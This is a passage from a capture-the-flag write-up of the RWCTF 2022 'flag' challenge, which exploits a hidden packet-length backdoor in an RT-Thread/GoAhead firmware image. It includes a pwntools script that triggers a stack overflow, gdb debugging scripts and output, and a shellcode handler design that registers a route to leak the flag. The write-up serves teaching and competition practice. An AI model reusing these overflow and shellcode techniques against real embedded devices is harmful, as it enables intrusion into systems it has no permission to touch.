*/</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">pbuf</span> *<span class="built_in">smc911x_emac_rx</span>(<span class="type">rt_device_t</span> dev)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">pbuf</span> *p = RT_NULL;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">eth_device_smc911x</span> *emac;</span><br><span class="line"></span><br><span class="line">    emac = <span class="built_in">SMC911X_EMAC_DEVICE</span>(dev);</span><br><span class="line">    <span class="built_in">RT_ASSERT</span>(emac != RT_NULL);</span><br><span class="line"></span><br><span class="line">    <span class="comment">/* take the emac buffer to the pbuf */</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">LAN9118_RX_FIFO_INF_RXSUSED</span>(<span class="built_in">smc911x_reg_read</span>(emac, LAN9118_RX_FIFO_INF)))</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="type">uint32_t</span> status;</span><br><span class="line">        <span class="type">uint32_t</span> pktlen, tmplen;</span><br><span class="line"></span><br><span class="line">        status = <span class="built_in">smc911x_reg_read</span>(emac, LAN9118_RXSFIFOP);</span><br><span class="line"></span><br><span class="line">        <span class="comment">/* get frame length */</span></span><br><span class="line">        pktlen = (status &amp; LAN9118_RX_STS_PKT_LEN) &gt;&gt; <span class="number">16</span>;</span><br><span class="line"></span><br><span class="line">        <span class="built_in">smc911x_reg_write</span>(emac, LAN9118_RX_CFG, <span class="number">0</span>);</span><br><span class="line"></span><br><span class="line">        tmplen = (pktlen + <span class="number">3</span>) / <span class="number">4</span>;</span><br><span 
class="line"></span><br><span class="line">        <span class="comment">/* allocate pbuf */</span></span><br><span class="line">        p = <span class="built_in">pbuf_alloc</span>(PBUF_RAW, tmplen * <span class="number">4</span>, PBUF_RAM);</span><br><span class="line">        <span class="keyword">if</span> (p)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="type">uint32_t</span> *data = (<span class="type">uint32_t</span> *)p-&gt;payload;</span><br><span class="line">            <span class="keyword">while</span> (tmplen--)</span><br><span class="line">            &#123;</span><br><span class="line">                *data++ = <span class="built_in">smc911x_reg_read</span>(emac, LAN9118_RXDFIFOP);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> (status &amp; LAN9118_RXS_ES)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="built_in">rt_kprintf</span>(DRIVERNAME <span class="string">&quot;: dropped bad packet. 
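Status: 0x%08x\n&quot;</span>, status);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> p;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Comparing the two, the backdoor is triggered under the following conditions:</p><ul><li>Send <strong>8</strong> payload packets whose <strong>lengths</strong> equal the corresponding unsigned char values in a specific array (that is, the bytes of the string <code>backdoor</code>).</li><li>The whole sequence must finish within 5 s: every packet after the first must arrive no more than 4 s after it, as measured by <code>time(0)</code>.</li><li>Once the backdoor counter reaches 8, the next payload packet must have length 0x202.</li></ul><p>This triggers a buffer overflow that <strong>writes 0x202 bytes into a 0x64-byte array</strong>.</p><p>Since the challenge has no NX, PIE, or ASLR protections, we can use the overflow to hijack control flow and run our shellcode. <strong>After the shellcode finishes, it must restore the function's stack data and jump back to the original function</strong>.</p><blockquote><p>This real-time OS has no kernel/user-space separation, so if the runtime environment is corrupted and control flow cannot continue, the whole system <strong>reboots or halts immediately</strong>.</p></blockquote><p>The shellcode therefore needs careful design. Two possible approaches:</p><ul><li><p>Manually register an <strong>event handler</strong> and a <strong>route</strong> for action/backdoor, and copy the incoming flag straight into the data of some other file (for example <code>/path/to/file1</code>). When the health checker passes the flag to <code>action/backdoor</code>, we can then fetch it by requesting <code>/path/to/file1</code>.</p></li><li><p>Patch the error page so that it always shows <code>&#123;&quot;status&quot; : &quot;success&quot;&#125;</code> and returns HTTP status 200. Then patch the code that renders the error page so that it references the flag held in the challenge's memory. The next time we request the error page, the flag is read from memory and returned to the browser.</p></li></ul><h2 id="六、漏洞利用">6. Exploitation</h2><h3 id="a-触发-backdoor">a. 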
Triggering the backdoor</h3><p>I chose the first approach (for the challenge): manually registering the event handler and route for action/backdoor.</p><p>Dynamic debugging shows that:</p><ul><li><strong>The packet metadata is 0x3a bytes long</strong>, so we must subtract that length from the payload we send.</li><li>Packets <strong>must be sent with a delay between them</strong>. Otherwise several packets may <strong>arrive out of order</strong> because of network effects and fail the backdoor check.</li><li>The program may also receive packets that <strong>do not come from the attacker</strong> (about 0x3e bytes long, origin unknown), so these need to be filtered out while debugging.</li></ul><p>Based on this analysis, the following code triggers the vulnerability:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#! 
python3</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(</span><br><span class="line">    os=<span class="string">&#x27;linux&#x27;</span>,</span><br><span class="line">    arch=<span class="string">&#x27;arm&#x27;</span>,</span><br><span class="line">    bits=<span class="number">32</span>,</span><br><span class="line">    encoding=<span class="string">&#x27;latin&#x27;</span>,</span><br><span class="line">    log_level=<span class="string">&quot;debug&quot;</span></span><br><span class="line">)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">send_packet</span>(<span class="params">packet_len, data=<span class="string">b&#x27;&#x27;</span></span>):</span><br><span class="line">    p = remote(<span class="string">&quot;127.0.0.1&quot;</span>, <span class="number">5555</span>)</span><br><span class="line">    remain_len = packet_len - <span class="built_in">len</span>(data)</span><br><span class="line">    <span class="keyword">assert</span> remain_len &gt;= <span class="number">0</span></span><br><span class="line">    p.send(data + <span class="string">b&quot;_&quot;</span> * remain_len)</span><br><span class="line">    p.close()</span><br><span class="line">    time.sleep(<span class="number">0.2</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>: </span><br><span class="line">    <span class="keyword">for</span> ch <span class="keyword">in</span> <span class="string">&quot;backdoor&quot;</span>: <span class="comment"># \x62 \x61 \x63 \x6b \x64 \x6f \x6f \x72</span></span><br><span class="line">        send_packet(<span class="built_in">ord</span>(ch) - <span class="number">0x3a</span>)</span><br><span class="line">    send_packet(<span class="number">0x202</span> - <span 
class="number">0x3a</span>)</span><br></pre></td></tr></table></figure><p>Recall that the trigger sequence is time-limited (every packet must arrive within 4 s of the first), so stepping through it by hand is impractical. I wrote the following gdb script to assist debugging:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line">target remote localhost:1234</span><br><span class="line">b *0x6001b1b4</span><br><span class="line">commands</span><br><span class="line">    <span class="keyword">if</span> <span class="variable">$r3</span> &gt; 0x60</span><br><span class="line">        <span class="built_in">printf</span> <span class="string">&quot;packet len 
= 0x%x\n&quot;</span>, <span class="variable">$r3</span></span><br><span class="line">    end</span><br><span class="line">    <span class="built_in">continue</span></span><br><span class="line">end</span><br><span class="line"></span><br><span class="line">b* 0x6001B1BC</span><br><span class="line">commands</span><br><span class="line">    <span class="built_in">printf</span> <span class="string">&quot;backdoor_cnt = 0\n&quot;</span></span><br><span class="line">    <span class="built_in">continue</span></span><br><span class="line">end</span><br><span class="line"></span><br><span class="line">b* 0x6001B250</span><br><span class="line">commands</span><br><span class="line">    <span class="built_in">printf</span> <span class="string">&quot;backdoor_cnt = %d\n&quot;</span>, <span class="variable">$r2</span></span><br><span class="line">    <span class="built_in">continue</span></span><br><span class="line">end</span><br><span class="line"></span><br><span class="line">b* 0x6001B298</span><br><span class="line">commands</span><br><span class="line">    <span class="built_in">printf</span> <span class="string">&quot;backdoor_memcpy called\n&quot;</span></span><br><span class="line">    tb *0x6001b2a8</span><br><span class="line">    <span class="comment"># continue</span></span><br><span class="line">end</span><br><span class="line"></span><br><span class="line">b* 0x600101E4</span><br><span class="line">commands</span><br><span class="line">    <span class="built_in">printf</span> <span class="string">&quot;submit handler called\n&quot;</span></span><br><span class="line">    <span class="built_in">printf</span> <span class="string">&quot;Webs* wp = 0x%x\n&quot;</span>, <span class="variable">$r0</span></span><br><span class="line">    <span class="built_in">continue</span></span><br><span class="line">end</span><br><span class="line"></span><br><span class="line">b* 0x60010208</span><br><span class="line">commands</span><br><span class="line">    <span 
class="built_in">printf</span> <span class="string">&quot;submit handler websGetVar called\n&quot;</span></span><br><span class="line">    <span class="built_in">continue</span></span><br><span class="line">end</span><br><span class="line"></span><br><span class="line"><span class="comment"># b* 0x60d9c5e8     shellcode ret</span></span><br><span class="line"><span class="comment"># b* 0x60d9c5ec     handler address</span></span><br><span class="line"></span><br><span class="line">c</span><br></pre></td></tr></table></figure><p>Running it gives the output below, which shows that the stack overflow is triggered successfully:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span 
class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br></pre></td><td class="code"><pre><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? 
()</span><br><span class="line">packet len = 0x62</span><br><span class="line"></span><br><span class="line">Breakpoint 2, 0x6001b1bc <span class="keyword">in</span> ?? ()</span><br><span class="line">backdoor_cnt = 1</span><br><span class="line"></span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">packet len = 0x61</span><br><span class="line"></span><br><span class="line">Breakpoint 3, 0x6001b238 <span class="keyword">in</span> ?? ()</span><br><span class="line">backdoor_cnt = 2</span><br><span class="line"></span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">packet len = 0x63</span><br><span class="line"></span><br><span class="line">Breakpoint 3, 0x6001b238 <span class="keyword">in</span> ?? ()</span><br><span class="line">backdoor_cnt = 3</span><br><span class="line"></span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? 
()</span><br><span class="line">packet len = 0x6b</span><br><span class="line"></span><br><span class="line">Breakpoint 3, 0x6001b238 <span class="keyword">in</span> ?? ()</span><br><span class="line">backdoor_cnt = 4</span><br><span class="line"></span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">packet len = 0x64</span><br><span class="line"></span><br><span class="line">Breakpoint 3, 0x6001b238 <span class="keyword">in</span> ?? ()</span><br><span class="line">backdoor_cnt = 5</span><br><span class="line"></span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">packet len = 0x6f</span><br><span class="line"></span><br><span class="line">Breakpoint 3, 0x6001b238 <span class="keyword">in</span> ?? ()</span><br><span class="line">backdoor_cnt = 6</span><br><span class="line"></span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? 
()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">packet len = 0x6f</span><br><span class="line"></span><br><span class="line">Breakpoint 3, 0x6001b238 <span class="keyword">in</span> ?? ()</span><br><span class="line">backdoor_cnt = 7</span><br><span class="line"></span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">packet len = 0x72</span><br><span class="line"></span><br><span class="line">Breakpoint 3, 0x6001b238 <span class="keyword">in</span> ?? ()</span><br><span class="line">backdoor_cnt = 8</span><br><span class="line"></span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? 
()</span><br><span class="line">packet len = 0x202</span><br><span class="line"></span><br><span class="line">Breakpoint 4, 0x6001b298 <span class="keyword">in</span> ?? ()</span><br><span class="line">backdoor_memcpy called</span><br></pre></td></tr></table></figure><p>The machine then crashes:</p><p><img src="/2022/01/rwctf2022_flag/image-20220129164005728.png" alt="image-20220129164005728"></p><blockquote><p>After the crash, press <code>ctrl + a</code>, release, then press <code>x</code> to shut down QEMU.</p></blockquote><p>Restart debugging and return to the call site where the stack overflow happens. Note that <strong>the arguments of the call are passed in R0, R1, and R2</strong>.</p><h3 id="b-栈溢出与-shellcode-上传">b. Stack overflow and uploading the shellcode</h3><p>Next we dump the current stack contents and write them back in full as part of the overflow, so that the stack data stays intact. Because the overwrite is 0x202 bytes long, it is certain to clobber the stack frames below, so they must be restored or the program may crash.</p><p><img src="/2022/01/rwctf2022_flag/image-20220129172718822.png" alt="image-20220129172718822"></p><p>Note that the overflow leaves very little room for shellcode of our own, only about 0x20 bytes. We therefore have to upload the shellcode some other way and use the overflow only to modify the return address so that execution jumps to it.</p><p>The shellcode can be uploaded through the submit method of the GoAhead extension described earlier; dynamic debugging reveals the memory address where the submit message is stored.</p><p>However, the shellcode address to jump to at overflow time is <strong>not</strong> this v4, because by the time the overflow happens the memory at v4 has already been overwritten:</p><p><img src="/2022/01/rwctf2022_flag/image-20220129215935617.png" alt="image-20220129215935617"></p><p>So how do we obtain the shellcode address? We can prepend a marker string to the shellcode, for example &quot;ShellcodeHeader&quot;, and then use the gdb command <strong>find</strong> to search memory globally for it:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">find 0x60000000, +0x4000000, <span class="string">&#x27;S&#x27;</span>,<span class="string">&#x27;h&#x27;</span>,<span class="string">&#x27;e&#x27;</span>,<span class="string">&#x27;l&#x27;</span>,<span class="string">&#x27;l&#x27;</span>,<span class="string">&#x27;c&#x27;</span>,<span class="string">&#x27;o&#x27;</span>,<span class="string">&#x27;d&#x27;</span>,<span class="string">&#x27;e&#x27;</span></span><br><span class="line"><span class="comment"># We avoid find xxx, +xxx, &quot;Shellcode&quot; because that form would also match the trailing 
\0</span></span><br></pre></td></tr></table></figure><p>The search result is shown below. Note that the shellcode here has been URL-encoded (which is a separate problem):</p><p><img src="/2022/01/rwctf2022_flag/image-20220130164148119.png" alt="image-20220130164148119"></p><blockquote><p>Alternatively, reverse-engineer the <code>websSetSessionVar</code> function and find the address of the copied string.</p></blockquote><p>One more point: before submitting the shellcode, <strong>you must log in on the current session</strong>; otherwise the shellcode cannot be found in memory.</p><h3 id="c-shellcode-的作用">c. What the shellcode does</h3><p>The shellcode has two main jobs:</p><ul><li><p>Call <code>websDefineAction(&quot;backdoor&quot;, backdoor_handler)</code> to register the handler, where:</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">websDefineAction address: 0x6004D28C</span><br></pre></td></tr></table></figure><p>The &quot;backdoor&quot; string does not need to persist, because <code>websDefineAction</code> <strong>copies</strong> it into a hash table when it runs.</p><p>The backdoor_handler code, however, does need to persist, so it must be copied somewhere stable (for example into the file system; here I chose to copy the handler shellcode to <code>/login_err.html</code> + 0x200, that is, 0x606D3aD0).</p><p>The backdoor handler has to do the following:</p><ul><li><p>Copy the flag that the checker may pass in to the 404 page.</p></li><li><p>Return a <strong>200 {&quot;status&quot;:&quot;success&quot;}</strong> page.</p></li></ul><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">static</span> <span class="type">void</span> <span class="title">backdoor_handler</span><span class="params">(Webs *wp)</span></span></span><br><span class="line"><span 
class="function"></span>&#123;</span><br><span class="line">    <span class="type">const</span> <span class="type">char</span>* key = <span class="string">&quot;flag&quot;</span>;</span><br><span class="line">    <span class="type">const</span> <span class="type">char</span>* page = <span class="string">&quot;&#123;\&quot;status\&quot; : \&quot;success\&quot;&#125;&quot;</span>;</span><br><span class="line">    <span class="comment">// Pass key as the third (default) argument so websGetVar never returns NULL when the variable is missing; this keeps the shellcode simple</span></span><br><span class="line">    <span class="type">const</span> <span class="type">char</span>* name = <span class="built_in">websGetVar</span>(wp, key, key); <span class="comment">// websGetVar: 0x600577C4</span></span><br><span class="line">    <span class="comment">// print the flag</span></span><br><span class="line">    <span class="built_in">rt_kprintf</span>(name); </span><br><span class="line">    <span class="comment">// send page</span></span><br><span class="line">    <span class="built_in">websSetStatus</span>(wp, <span class="number">200</span>);      <span class="comment">// websSetStatus:       0x600588C4</span></span><br><span class="line">    <span class="built_in">websWriteHeaders</span>(wp, <span class="number">-1</span>, <span class="number">0</span>); <span class="comment">// websWriteHeaders:    0x6005891C</span></span><br><span class="line">    <span class="built_in">websWriteEndHeaders</span>(wp);     <span class="comment">// websWriteEndHeaders: 0x60058D30</span></span><br><span class="line">    <span class="built_in">websWrite</span>(wp, page);         <span class="comment">// websWrite:           0x60058E2C</span></span><br><span class="line">    <span class="built_in">websDone</span>(wp);                <span class="comment">// websDone:            0x6005496C</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>The code that returns the 200 OK response mainly follows <a href="https://github.com/embedthis/goahead/blob/master/test/test.c#L327">goahead/blob/master/test/test.c#L327</a>:</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">    Implement /action/actionTest. Parse the form variables: name, address and echo back.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">void</span> <span class="title">actionTest</span><span class="params">(Webs *wp)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    cchar   *name, *address;</span><br><span class="line"></span><br><span class="line">    name = <span class="built_in">websGetVar</span>(wp, <span class="string">&quot;name&quot;</span>, <span class="literal">NULL</span>);</span><br><span class="line">    address = <span class="built_in">websGetVar</span>(wp, <span class="string">&quot;address&quot;</span>, <span class="literal">NULL</span>);</span><br><span class="line">    <span class="built_in">websSetStatus</span>(wp, <span class="number">200</span>);</span><br><span class="line">    <span class="built_in">websWriteHeaders</span>(wp, <span class="number">-1</span>, <span class="number">0</span>);</span><br><span class="line">    <span class="built_in">websWriteEndHeaders</span>(wp);</span><br><span class="line">    <span class="built_in">websWrite</span>(wp, <span 
class="string">&quot;&lt;html&gt;&lt;body&gt;&lt;h2&gt;name: %s, address: %s&lt;/h2&gt;&lt;/body&gt;&lt;/html&gt;\n&quot;</span>, name, address);</span><br><span class="line">    <span class="built_in">websFlush</span>(wp, <span class="number">0</span>);</span><br><span class="line">    <span class="built_in">websDone</span>(wp);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>Call <code>websAddRoute(&quot;/action/backdoor&quot;, &quot;action&quot;, 0)</code> to register the route.</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">websAddRoute() addr: 0x600636A0</span><br></pre></td></tr></table></figure><p>Note that the third argument is 0. The route table is an array that is scanned in order, so setting pos to 0 <strong>places the target route first</strong>.</p><p>A pitfall I ran into: my original plan for re-registering routes was to overwrite <code>route.txt</code> and then call <code>websLoad(&quot;route.txt&quot;)</code>. After reading the source, however, this turned out to be too cumbersome:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span 
class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">    Load route and authentication configuration files</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function">PUBLIC <span class="type">int</span> <span class="title">websLoad</span><span class="params">(cchar *path)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    ...</span><br><span class="line">        </span><br><span class="line">    <span class="keyword">for</span> (line = <span class="built_in">stok</span>(buf, <span class="string">&quot;\r\n&quot;</span>, &amp;token); line; line = <span class="built_in">stok</span>(<span class="literal">NULL</span>, <span class="string">&quot;\r\n&quot;</span>, &amp;token)) &#123;</span><br><span class="line">        kind = <span class="built_in">stok</span>(line, <span class="string">&quot; \t&quot;</span>, &amp;next);</span><br><span class="line">        ...</span><br><span class="line">        <span class="keyword">if</span> (<span class="built_in">smatch</span>(kind, <span class="string">&quot;route&quot;</span>)) &#123;</span><br><span 
class="line">            auth = dir = handler = protocol = uri = <span class="number">0</span>;</span><br><span class="line">            abilities = extensions = methods = redirects = <span class="number">-1</span>;</span><br><span class="line">            <span class="keyword">while</span> ((option = <span class="built_in">stok</span>(<span class="literal">NULL</span>, <span class="string">&quot; \t\r\n&quot;</span>, &amp;next)) != <span class="number">0</span>) &#123;</span><br><span class="line">                key = <span class="built_in">stok</span>(option, <span class="string">&quot;=&quot;</span>, &amp;value);</span><br><span class="line">                <span class="keyword">if</span> ...</span><br><span class="line">                &#125; <span class="keyword">else</span> <span class="keyword">if</span> (<span class="built_in">smatch</span>(key, <span class="string">&quot;handler&quot;</span>)) &#123;</span><br><span class="line">                    handler = value;</span><br><span class="line">                &#125; <span class="keyword">else</span> <span class="keyword">if</span> (<span class="built_in">smatch</span>(key, <span class="string">&quot;methods&quot;</span>)) &#123;</span><br><span class="line">                    <span class="built_in">addOption</span>(&amp;methods, value, <span class="number">0</span>);</span><br><span class="line">                &#125; <span class="keyword">else</span> <span class="keyword">if</span> (<span class="built_in">smatch</span>(key, <span class="string">&quot;redirect&quot;</span>)) &#123;</span><br><span class="line">                    <span class="keyword">if</span> (<span class="built_in">strchr</span>(value, <span class="string">&#x27;@&#x27;</span>)) &#123;</span><br><span class="line">                        status = <span class="built_in">stok</span>(value, <span class="string">&quot;@&quot;</span>, &amp;redirectUri);</span><br><span class="line">                        <span class="keyword">if</span> 
